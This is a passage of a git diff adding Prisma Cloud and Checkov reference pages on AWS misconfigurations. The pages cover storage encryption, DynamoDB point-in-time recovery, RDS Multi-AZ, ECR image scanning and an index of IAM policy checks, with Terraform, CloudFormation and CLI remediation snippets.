'AWS::EFS::FileSystem' + Properties: + ... ++ Encrypted: true", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-18.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-18.adoc new file mode 100644 index 000000000..942774d1e --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-18.adoc @@ -0,0 +1,115 @@ +== Neptune storage is not securely encrypted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8244ecf5-3dad-400a-ba71-3b5162ede0f7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/NeptuneClusterStorageEncrypted.py[CKV_AWS_44] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon Neptune is a fully managed graph database service for building and running applications that work with connected datasets. +Neptune supports graph query languages such as Apache TinkerPop Gremlin and W3C's SPARQL. +Neptune also supports recommendation engines, fraud detection, knowledge graphs, drug discovery, and network security. +Encryption of Neptune storage protects data and metadata against unauthorized access. +It also fulfils compliance requirements for data-at-rest encryption of production file systems. +Encryption for an existing database cannot be added or changed after it is created. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the * https://console.aws.amazon.com/neptune/ [Amazon Neptune console]*. + +. To start the Launch DB instance wizard, click * Launch DB Instance*. + +. To customize the settings for your Neptune DB cluster, navigate to the * Specify DB details* page. + +. To enable encryption for a new Neptune DB instance, navigate to the * Enable encryption* section on the Neptune console and click * Yes*. + + +* CLI Command* + + +To creates a new Amazon Neptune DB cluster: + + +[source,shell] +---- +{ + " create-db-cluster +--db-cluster-identifier & lt;value> +--engine & lt;value> +--storage-encrypted true", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_neptune_cluster +* *Arguments:* storage_encrypted - (Optional) Specifies whether the Neptune cluster is encrypted. +The default is false if not specified. + + +[source,go] +---- +{ + "resource "aws_neptune_cluster" "example" { + ... + cluster_identifier = "neptune-cluster-demo" ++ storage_encrypted = true + ... +}", +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Neptune::DBCluster +* *Arguments:* Proprties.StorageEncrypted + + +[source,yaml] +---- +{ + "Type: "AWS::Neptune::DBCluster" + Properties: + ... ++ StorageEncrypted: true", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-25.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-25.adoc new file mode 100644 index 000000000..f9f835e02 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-25.adoc @@ -0,0 +1,78 @@ +== AWS Redshift instances are not encrypted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0132bbb2-c733-4c36-9c5d-c58967c7d1a6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py[CKV_AWS_64] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +We recommend all data stored in the Redshift cluster is securely encrypted at rest, you can create new encrypted clusters or enable CMK encryption on existing clusters, as AWS says "You can enable encryption when you launch your cluster, or you can modify an unencrypted cluster to use AWS Key Management Service (AWS KMS) encryption" https://docs.aws.amazon.com/redshift/latest/mgmt/working-with-db-encryption.html + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_redshift_cluster +* *Arguments:* encrypted, ensure that this argument is set to true to protect this database. +This change may recreate your cluster. + + +[source,go] +---- +{ + "resource "aws_redshift_cluster" "redshift" { + ... + cluster_identifier = "shifty" ++ encrypted = true + kms_key_id = var.kms_key_id + ... +} + +", + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Redshift::Cluster +* *Arguments:* Properties.Encrypted + + +[source,yaml] +---- +{ + "Type: "AWS::Redshift::Cluster" + Properties: + ... ++ Encrypted: true", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-3-encrypt-ebs-volume.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-3-encrypt-ebs-volume.adoc new file mode 100644 index 000000000..529388f0a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-3-encrypt-ebs-volume.adoc @@ -0,0 +1,110 @@ +== AWS EBS volumes are not encrypted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 47ff5620-39a5-4859-b020-0a8d0d9e192a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSEncryption.py[CKV_AWS_3] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Encrypting EBS volumes ensures that replicated copies of your images are secure even if they are accidentally exposed. +AWS EBS encryption uses AWS KMS customer master keys (CMK) when creating encrypted volumes and snapshots. +Storing EBS volumes in their encrypted state reduces the risk of data exposure or data loss. +We recommend you encrypt all data stored in the EBS. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the * https://console.aws.amazon.com/ec2/ [Amazon EC2 console]*. + +. From the navigation bar, select * Region*. + +. From the navigation pane, select * EC2 Dashboard*. + +. In the upper-right corner of the page, select * Account Attributes*, then * Settings*. + +. Under * EBS Storage*, select * Always encrypt new EBS volumes*. + +. Click * Update*. + + +* CLI Command* + + +To always encrypt new EBS volumes, use the following command: +[,bash] +---- +aws ec2 --region & lt;REGION> enable-ebs-encryption-by-default +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_ebs_volume +* *Arguments:* encrypted - (Optional) If true, the disk will be encrypted. + + +[source,go] +---- +{ + "resource "aws_ebs_volume" "example" { + ... + availability_zone = "${var.availability_zone}" ++ encrypted = true + ... +}", +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::EC2::Volume +* *Arguments:* Properties.Encrypted - (Optional) If true, the disk will be encrypted. + + +[source,yaml] +---- +{ + "Resources: + NewVolume: + Type: AWS::EC2::Volume + Properties: + ... ++ Encrypted: true", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-4.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-4.adoc new file mode 100644 index 000000000..4e047333a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-4.adoc @@ -0,0 +1,126 @@ +== AWS RDS DB cluster encryption is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| dae26f3c-d05a-4499-bdcd-fc5c32e3891f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/RDSEncryption.py[CKV_AWS_16] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +AWS RDS is a managed DB service enabling quick deployment and management of MySQL, MariaDB, PostgreSQL, Oracle, and Microsoft SQL Server DB engines. +Native RDS encryption helps protect your cloud applications and fulfils compliance requirements for data-at-rest encryption. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the * https://console.aws.amazon.com/rds/[Amazon RDS console]*. + +. Click * Snapshots*. + +. Select the snapshot that you want to encrypt. + +. Navigate to * Snapshot Actions*, select * Copy Snapshot*. + +. Select the * Destination Region*, then enter your * New DB Snapshot Identifier*. + +. Set * Enable Encryption* to * Yes*. + +. Select the * Master Key* from the list, then select * Copy Snapshot*. + + +* CLI Command* + + +If you use the create-db-instance AWS CLI command to create an encrypted DB instance, set the --storage-encrypted parameter to true. +If you use the CreateDBInstance API operation, set the StorageEncrypted parameter to true. + + +[source,shell] +---- +{ + "aws rds create-db-instance \\ + --db-instance-identifier test-mysql-instance \\ + --db-instance-class db.t3.micro \\ + --engine mysql \\ + --master-username admin \\ + --master-user-password secret99 \\ + --allocated-storage 20 + --storage-encrypted true +", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_db_instance +* *Arguments:* storage_encrypted - Specifies whether the DB instance is encrypted. + + +[source,go] +---- +{ + "resource "aws_db_instance" "example" { + ... + name = "mydb" ++ storage_encrypted = true +} + +", +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::RDS::DBInstance +* *Arguments:* Properties.StorageEncrypted + + +[source,yaml] +---- +{ + "Resources: + DB: + Type: 'AWS::RDS::DBInstance' + Properties: + ... ++ StorageEncrypted: true", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-6.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-6.adoc new file mode 100644 index 000000000..edc9e0219 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-6.adoc @@ -0,0 +1,113 @@ +== DynamoDB PITR is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 31575632-c4cd-4346-9db4-97b82c6befde + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DynamodbRecovery.py[CKV_AWS_28] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +DynamoDB Point-In-Time Recovery (PITR) is an automatic backup service for DynamoDB table data that helps protect your DynamoDB tables from accidental write or delete operations. +Once enabled, PITR provides continuous backups that can be controlled using various programmatic parameters. +PITR can also be used to restore table data from any point in time during the last 35 days, as well as any incremental backups of DynamoDB tables. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the * https://console.aws.amazon.com/dynamodb/ [Amazon DynamoDB console]*. + +. Navigate to the desired * DynamoDB* table, then select the * Backups* tab. + +. To turn the feature on, click * Enable*. ++ +The * Earliest restore date* and * Latest restore date* are visible within a few seconds. + + +* CLI Command* + + +To update continuous backup settings for a DynamoDB table: + + +[source,shell] +---- +{ + "aws dynamodb update-continuous-backups \\ + --table-name MusicCollection \\ + --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_dynamodb_table +* *Arguments:* point_in_time_recovery - (Optional) Point-in-time recovery options. + + +[source,go] +---- +{ + "resource "aws_dynamodb_table" "example" { + ... + name = "GameScores" ++ point_in_time_recovery { ++ enabled = true ++ } + ... +}", +} +---- + + +*CloudFormation / Serverless* + +* *Resource:* AWS::DynamoDB::Table +* *Property*: PointInTimeRecoverySpecification + + +[source,yaml] +---- +{ + " Resources: + iotCatalog: + Type: AWS::DynamoDB::Table + Properties: + ... + PointInTimeRecoverySpecification: ++ PointInTimeRecoveryEnabled: true", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-7.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-7.adoc new file mode 100644 index 000000000..e63efa041 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-7.adoc @@ -0,0 +1,97 @@ +== Not all data stored in the EBS snapshot is securely encrypted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1757fd25-6c31-4c7a-9899-8838150e108f + +|Checkov Check ID +|CKV_AWS_CUSTOM_3 + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +EBS snapshots must be encrypted, as they often include sensitive information, customer PII or CPNI. +Amazon EBS encryption uses AWS Key Management Service (AWS KMS) customer master keys (CMK) when creating encrypted volumes and snapshots. +With EBS encryption enabled, you no longer have to build, maintain, and secure your own key management infrastructure. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the * https://console.aws.amazon.com/ec2/ [Amazon EC2 console]*. + +. From the navigation bar, select * Region*. + +. From the navigation pane, select * EC2 Dashboard*. + +. In the upper-right corner of the page, click * Account Attributes*, then * EBS encryption*. + +. click * Manage*. + +. For Default encryption key, select a symmetric customer managed CMK. + +. Click * Update EBS encryption*. + + +* CLI Command* + + +To enable EBS encryption by default: + + +[source,shell] +---- +{ + "aws ec2 enable-ebs-encryption-by-default", +} +---- +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_ebs_snapshot +* *Arguments:* encrypted - Whether the snapshot is encrypted. + +Example fix: + + +[source,go] +---- +{ + "resource "aws_ebs_snapshot" "example" { + volume_id = "${aws_ebs_volume.example.id}" ++ encrypted = true + ... +} +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-73.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-73.adoc new file mode 100644 index 000000000..ddeb986ca --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-73.adoc @@ -0,0 +1,123 @@ +== RDS instances do not have Multi-AZ enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a846ac6b-0606-4d1f-993d-622f8e5e2ad6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py[CKV_AWS_157] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon RDS Multi-AZ deployments provide enhanced availability for databases within a single region. +In the event of a planned or unplanned outage of your DB instance, Amazon RDS automatically switches to a standby replica in another Availability Zone if you have enabled Multi-AZ. +RDS Multi-AZ deployments offer the following benefits: + +. Enhanced durability. + +. Increased availability. + +. Protection of your database performance. + +. Automatic failover. + +//// +=== Fix - Runtime + + +* AWS Console* + + + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the * https://console.aws.amazon.com/rds/ [Amazon RDS console]*. + +. To create a new Multi-AZ deployment using the AWS Management Console, simply click the "Yes" option for "Multi-AZ Deployment" when launching a DB Instance. + +. To convert an existing Single-AZ DB Instance to a Multi-AZ deployment, use the "Modify" option corresponding to your DB Instance in the AWS Management Console. + + +* CLI Command* + + +If you use the `create-db-instance` AWS CLI command to create a Multi-AZ DB instance, set the `--multi-az` parameter to `true`. +If you use the CreateDBInstance API operation, set the `MultiAZ` parameter to `true`. +You can't set the `AvailabilityZone` parameter if the DB instance is a Multi-AZ deployment. + + +[source,shell] +---- +{ + "aws rds create-db-instance \\ + --db-instance-identifier test-mysql-instance \\ + --db-instance-class db.t3.micro \\ + --engine mysql \\ + --master-username admin \\ + --master-user-password secret99 \\ + --allocated-storage 20 \\ + --multi-az true", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_db_instance +* *Arguments:* multi_az - Specifies if the RDS instance is Multi-AZ. + + +[source,go] +---- +{ + "resource "aws_db_instance" "default" { + ... + name = "mydb" ++ multi_az = true +}", +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::RDS::DBInstance +* *Arguments:* Properties.MultiAZ + + +[source,yaml] +---- +{ + "Resources: + MyDBEnabled: + Type: 'AWS::RDS::DBInstance' + Properties: + ... ++ MultiAZ: true", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-8.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-8.adoc new file mode 100644 index 000000000..82ff279f3 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-8.adoc @@ -0,0 +1,116 @@ +== ECR image scan on push is not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f77154ed-b9d4-4cf5-ae49-5b0ac9d0bd81 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py[CKV_AWS_163] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon ECR is a fully managed container registry used to store, manage and deploy container images. +ECR Image Scanning assesses and identifies operating system vulnerabilities. +Using automated image scans you can ensure container image vulnerabilities are found before getting pushed to production. +ECR APIs notify if vulnerabilities were found when a scan completes. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the * https://console.aws.amazon.com/ecr/repositories [Amazon ECR console]*. + +. Select a repository using the radio button. + +. Click * Edit*. + +. Enable the * Scan on push* toggle. + + +* CLI Command* + + +To create a repository configured for * scan on push*: + + +[source,shell] +---- +{ + "aws ecr create-repository +--repository-name name +--image-scanning-configuration scanOnPush=true +--region us-east-2", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_ecr_repository +* *Arguments:* scan_on_push - (Required) Indicates whether images are scanned after being pushed to the repository (true) or not scanned (false). + + +[source,go] +---- +{ + "resource "aws_ecr_repository" "example" { + ... + image_tag_mutability = "MUTABLE" ++ image_scanning_configuration { ++ scan_on_push = true ++ } + ... +}", +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::ECR::Repository +* *Arguments:* Properties.ImageScanningConfiguration.ScanOnPush - (Required) Indicates whether images are scanned after being pushed to the repository (true) or not scanned (false). + + +[source,yaml] +---- +{ + "Resources: + ImageScanTrue: + Type: AWS::ECR::Repository + Properties: + ... ++ ImageScanningConfiguration: ++ ScanOnPush: true", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-9.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-9.adoc new file mode 100644 index 000000000..88a88fc74 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-9.adoc @@ -0,0 +1,117 @@ +== AWS ElastiCache Redis cluster with encryption for data at rest disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 884954a8-d886-4d58-a814-7fda27936166 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py[CKV_AWS_29] + +|Severity +|MEDIUM + +|Subtype +|Build +//,Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +ElastiCache for Redis offers default encryption at rest as a service, as well as the ability to use your own symmetric customer-managed customer master keys in AWS Key Management Service (KMS). + +ElastiCache for Redis at-rest encryption encrypts the following aspects: + +* Disk during sync, backup and swap operations +* Backups stored in Amazon S3 + +//// +=== Fix - Runtime + + +* ElastiCache Console To create a replication group using the * ElastiCache console*, make the following selections:* + + + +. Engine: redis. + +. Engine version: 3.2.6, 4.0.10 or later. + +. Encryption at-rest list: Yes. + + +* CLI Command* + + +The following operation creates the Redis (cluster mode disabled) replication group my-classic-rg with three nodes (--num-cache-clusters), a primary and two read replicas. +At-rest encryption is enabled for this replication group (--at-rest-encryption-enabled). + + +[source,shell] +---- +{ + "aws elasticache create-replication-group \\ + --replication-group-id my-classic-rg \\ + --replication-group-description "3 node replication group" \\ + --cache-node-type cache.m4.large \\ + --engine redis \\ + --engine-version 4.0.10 \\ + --at-rest-encryption-enabled \\ + --num-cache-clusters 3 \\ + --cache-parameter-group default.redis4.0 +", +} +---- + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_elasticache_replication_group +* *Arguments:* at_rest_encryption_enabled - (Optional) Whether to enable encryption at rest. + + +[source,go] +---- +{ + "resource "aws_elasticache_replication_group" "default"{ + ... + replication_group_id = "default-1" ++ at_rest_encryption_enabled = true + ... +}", +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::ElastiCache::ReplicationGroup +* *Arguments:* AtRestEncryptionEnabled + + +[source,yaml] +---- +Resources: + ReplicationGroup: + Type: 'AWS::ElastiCache::ReplicationGroup' + Properties: + ... ++ AtRestEncryptionEnabled: True +---- diff --git a/code-security/policy-reference/aws-policies/aws-iam-policies/aws-iam-policies.adoc b/code-security/policy-reference/aws-policies/aws-iam-policies/aws-iam-policies.adoc new file mode 100644 index 000000000..1319462d4 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-iam-policies/aws-iam-policies.adoc @@ -0,0 +1,159 @@ +== AWS IAM Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-aws-iam-43.adoc[AWS IAM policy documents do not allow * (asterisk) as a statement's action] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py[CKV_AWS_49] +|HIGH + + +|xref:bc-aws-iam-44.adoc[AWS IAM role allows all services or principals to be assumed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/IAMRoleAllowsPublicAssume.py[CKV_AWS_60] +|HIGH + + +|xref:bc-aws-iam-45.adoc[AWS IAM policy does allow assume role permission across all services] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py[CKV_AWS_61] +|HIGH + + +|xref:bc-aws-iam-46.adoc[AWS SQS queue access policy is overly permissive] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SQSPolicy.py[CKV_AWS_72] +|HIGH + + +|xref:ensure-an-iam-role-is-attached-to-ec2-instance.adoc[AWS EC2 Instance IAM Role not enabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml[CKV2_AWS_41 ] +|MEDIUM + + +|xref:ensure-an-iam-user-does-not-have-access-to-the-console-group.adoc[IAM User has access to the console] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml[CKV2_AWS_22] +|MEDIUM + + +|xref:ensure-aws-cloudfromt-distribution-with-s3-have-origin-access-set-to-enabled.adoc[AWS Cloudfront Distribution with S3 have Origin Access set to disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml[CKV2_AWS_46] +|MEDIUM + + +|xref:ensure-iam-policies-do-not-allow-credentials-exposure.adoc[Credentials exposure actions return credentials in an API response] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py[CKV_AWS_107] +|LOW + + +|xref:ensure-iam-policies-do-not-allow-data-exfiltration.adoc[Data exfiltration allowed without resource constraints] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/data/aws/IAMDataExfiltration.py[CKV_AWS_108] +|LOW + + +|xref:ensure-iam-policies-do-not-allow-permissions-management-resource-exposure-without-constraint.adoc[Resource exposure allows modification of policies and exposes resources] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py[CKV_AWS_109] +|LOW + + +|xref:ensure-iam-policies-do-not-allow-write-access-without-constraint.adoc[Write access allowed without constraint] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/data/aws/IAMWriteAccess.py[CKV_AWS_111] +|LOW + + +|xref:ensure-iam-policies-does-not-allow-privilege-escalation.adoc[IAM policies allow privilege escalation] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py[CKV_AWS_110] +|MEDIUM + + +|xref:ensure-kms-key-policy-does-not-contain-wildcard-principal.adoc[AWS KMS Key policy overly permissive] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py[CKV_AWS_33] +|HIGH + + +|xref:ensure-rds-cluster-has-iam-authentication-enabled.adoc[AWS RDS cluster not configured with IAM authentication] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py[CKV_AWS_162] +|MEDIUM + + +|xref:ensure-rds-database-has-iam-authentication-enabled.adoc[RDS database does not have IAM authentication enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py[CKV_AWS_161] +|MEDIUM + + +|xref:ensure-s3-bucket-does-not-allow-access-to-all-authenticated-users.adoc[AWS S3 buckets are accessible to any authenticated user] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml[CKV2_AWS_43] +|HIGH + + +|xref:ensure-that-all-iam-users-are-members-of-at-least-one-iam-group.adoc[Not all IAM users are members of at least one IAM group] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml[CKV2_AWS_21] +|LOW + + +|xref:ensure-that-an-amazon-rds-clusters-have-iam-authentication-enabled.adoc[IAM authentication for Amazon RDS clusters is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSEnableIAMAuthentication.py[CKV_AWS_128] +|LOW + + +|xref:ensure-that-iam-groups-include-at-least-one-iam-user.adoc[IAM groups do not include at least one IAM user] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml[CKV2_AWS_14] +|LOW + + +|xref:ensure-that-respective-logs-of-amazon-relational-database-service-amazon-rds-are-enabled.adoc[Respective logs of Amazon RDS are disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DBInstanceLogging.py[CKV_AWS_129] +|LOW + + +|xref:iam-10.adoc[AWS IAM password policy does allow password reuse] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py[CKV_AWS_13] +|HIGH + + +|xref:iam-11.adoc[AWS IAM password policy does not expire in 90 days] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py[CKV_AWS_9] +|MEDIUM + +|xref:iam-16-iam-policy-privileges-1.adoc[AWS IAM policy attached to users] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py[CKV_AWS_40] +|LOW + + + +|xref:iam-23.adoc[AWS IAM policies that allow full administrative privileges are created] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/serverless/checks/function/aws/AdminPolicyDocument.py[CKV_AWS_1] +|LOW + + + +|xref:iam-48.adoc[AWS IAM policy documents allow * (asterisk) as a statement's action] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py[CKV_AWS_63] +|HIGH + + +|xref:iam-5.adoc[AWS IAM password policy does not have an uppercase character] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py[CKV_AWS_15] +|MEDIUM + +|xref:iam-6.adoc[AWS IAM password policy does not have a lowercase character] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py[CKV_AWS_11] +|MEDIUM + + +|xref:iam-7.adoc[AWS IAM password policy does not have a symbol] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py[CKV_AWS_14] +|MEDIUM + + +|xref:iam-8.adoc[AWS IAM password policy does not have a number] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py[CKV_AWS_12] +|MEDIUM + + +|xref:iam-9-1.adoc[AWS IAM password policy does not have a minimum of 14 characters] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py[CKV_AWS_10] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/aws-policies/aws-iam-policies/bc-aws-iam-43.adoc b/code-security/policy-reference/aws-policies/aws-iam-policies/bc-aws-iam-43.adoc new file mode 100644 index 000000000..80d2ab73f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-iam-policies/bc-aws-iam-43.adoc @@ -0,0 +1,89 @@ +== AWS IAM policy documents do not allow * (asterisk) as a statement's action + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 663ffb0a-4219-41ba-b72c-53aa9c694f5b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py[CKV_AWS_49] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,Serverless,TerraformPlan + +|=== + + + +=== Description + + +The Action element describes the specific action or actions that will be allowed or denied. +Statements must include either an Action or NotAction element. +Each AWS service has its own set of actions that describe tasks that can be performed with that service. +Specify a value using a namespace that identifies a service, for example, iam, ec2 sqs, sns, s3, followed by the name of the action to be allowed or denied. +The name must match an action that is supported by the service. +We recommend you do not allow "*" (all resource) statements as part of action elements. +This level of access could potentially grant unwanted and unregulated access to anyone given this policy document setting. +We recommend you to write a refined policy describing the specific action allowed or required by the specific policy holder. + +//// +=== Fix - Runtime + + +* AWS Console* + + + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/iam/ 